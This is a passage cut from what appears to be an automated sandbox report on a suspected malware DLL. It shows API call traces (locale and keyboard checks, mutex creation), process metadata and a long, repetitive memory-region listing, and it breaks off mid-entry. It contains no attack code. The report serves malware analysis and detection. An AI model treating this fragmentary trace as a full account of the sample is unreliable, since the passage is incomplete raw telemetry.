lpProcName="GetSystemDefaultLangID") returned 0x7ffc5ecf8d90 [0141.621] GetSystemDefaultLangID () returned 0x409 [0141.621] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="GetKeyboardLayoutList") returned 0x7ffc5e9929a0 [0141.622] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0141.622] GetProcessHeap () returned 0x530000 [0141.622] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x8) returned 0x533cb0 [0141.622] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="GetKeyboardLayoutList") returned 0x7ffc5e9929a0 [0141.622] GetKeyboardLayoutList (in: nBuff=1, lpList=0x533cb0 | out: lpList=0x533cb0) returned 1 [0141.622] GetProcessHeap () returned 0x530000 [0141.622] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x533cb0 | out: hHeap=0x530000) returned 1 [0141.622] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateMutexA") returned 0x7ffc5ecfd6e0 [0141.622] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{a4f25aea-0e06-40f9-81b2-53370f3faa31}") returned 0x17c [0141.622] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetLastError") returned 0x7ffc5eceb710 [0141.623] GetLastError () returned 0x0 [0141.623] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0141.623] CloseHandle (hObject=0x17c) returned 1 [0141.623] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateMutexA") returned 0x7ffc5ecfd6e0 [0141.623] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{4b03c46d-9a60-4fba-bdeb-7fc0f42c98fa}") returned 0x17c [0141.623] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetLastError") returned 0x7ffc5eceb710 [0141.623] GetLastError () returned 0xb7 [0141.623] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0141.623] CloseHandle (hObject=0x17c) returned 1 [0141.623] ExitProcess (uExitCode=0x1) [0141.624] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x53c300 | out: hHeap=0x530000) returned 1 [0141.624] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x545af0 | out: hHeap=0x530000) returned 1 [0141.625] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0141.625] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0141.625] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0141.625] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0141.625] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0141.625] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0141.626] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5470d0 | out: hHeap=0x530000) returned 1 [0141.626] RtlInterlockedFlushSList (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) returned 0x0 [0141.626] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 [0141.626] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 Thread: id = 35 os_tid = 0x4e8 Process: id = "11" image_name = "giumlol.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe" page_root = "0xfbf3000" os_pid = "0xcbc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcc8" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_codec_set_threads" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1321 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1322 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1323 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1324 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 1325 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 1326 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1327 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1328 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1329 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 1330 start_va = 0x7ff626f50000 end_va = 0x7ff626f77fff monitored = 1 entry_point = 0x7ff626f51e8c region_type = mapped_file name = "giumlol.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe") Region: id = 1331 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1332 start_va = 0x430000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 1333 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1334 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1335 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1336 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 1337 start_va = 0x530000 end_va = 0x5edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1338 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1339 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1340 start_va = 0x5f0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 1341 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1342 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1343 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1344 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1345 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1346 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1347 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1348 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1349 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1350 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1351 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1352 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1353 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1354 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1355 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1356 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1357 start_va = 0x180000 end_va = 0x1b8fff monitored = 0 entry_point = 0x1812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1358 start_va = 0x6f0000 end_va = 0x877fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 1359 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1360 start_va = 0x880000 end_va = 0xa00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 1361 start_va = 0xa10000 end_va = 0x1e0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 1362 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 1363 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1364 start_va = 0x1e10000 end_va = 0x200ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 1365 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1366 start_va = 0x1e10000 end_va = 0x1ecffff monitored = 0 entry_point = 0x1e30da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1367 start_va = 0x2000000 end_va = 0x200ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 1368 start_va = 0x7ffc45e90000 end_va = 0x7ffc45fd6fff monitored = 1 entry_point = 0x7ffc45f67cec region_type = mapped_file name = "8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" filename = "\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") Region: id = 1372 start_va = 0x1e10000 end_va = 0x1f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 1373 start_va = 0x2010000 end_va = 0x220ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002010000" filename = "" Region: id = 1377 start_va = 0x2210000 end_va = 0x260ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 1378 start_va = 0x2610000 end_va = 0x2e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 1382 start_va = 0x2e10000 end_va = 0x3ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e10000" filename = "" Region: id = 2007 start_va = 0x180000000 end_va = 0x180018fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000180000000" filename = "" Region: id = 2008 start_va = 0x3de0000 end_va = 0x4116fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2060 start_va = 0x7ffc51070000 end_va = 0x7ffc512fdfff monitored = 0 entry_point = 0x7ffc51140f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 2061 start_va = 0x4120000 end_va = 0x43abfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 2077 start_va = 0x4120000 end_va = 0x426cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 2079 start_va = 0x4120000 end_va = 0x42e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 2095 start_va = 0x4120000 end_va = 0x56aafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 2170 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2173 start_va = 0x7ffc5c190000 end_va = 0x7ffc5c356fff monitored = 0 entry_point = 0x7ffc5c1edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2174 start_va = 0x7ffc5be60000 end_va = 0x7ffc5be6ffff monitored = 0 entry_point = 0x7ffc5be656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2175 start_va = 0x4120000 end_va = 0x42e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 2183 start_va = 0x7ffc5a8a0000 end_va = 0x7ffc5a949fff monitored = 0 entry_point = 0x7ffc5a8c7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 2184 start_va = 0x7ffc5e740000 end_va = 0x7ffc5e7aafff monitored = 0 entry_point = 0x7ffc5e7590c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2185 start_va = 0x7ffc5e950000 end_va = 0x7ffc5e957fff monitored = 0 entry_point = 0x7ffc5e951ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2188 start_va = 0x7ffc5cb30000 end_va = 0x7ffc5cb46fff monitored = 0 entry_point = 0x7ffc5cb31390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2190 start_va = 0x4120000 end_va = 0x4277fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 2195 start_va = 0x7ffc4bf10000 end_va = 0x7ffc4bf1afff monitored = 0 entry_point = 0x7ffc4bf124e0 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 2197 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2198 start_va = 0x1b0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2199 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2200 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2201 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2202 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2203 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2204 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2205 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2206 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2207 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2208 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2209 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2210 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2211 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2212 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2213 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2214 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2215 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2216 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2217 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2218 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2219 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2220 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2221 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2222 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2223 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2224 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2225 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2226 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2227 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2228 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2229 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2230 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2231 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2232 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2233 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2234 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2235 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2236 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2237 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2238 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2241 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2242 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2243 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2244 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2245 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2246 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2247 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2248 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2249 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2250 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2251 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2252 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2253 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2254 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2255 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2256 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2257 start_va = 0x1b0000 end_va = 0x1b6fff 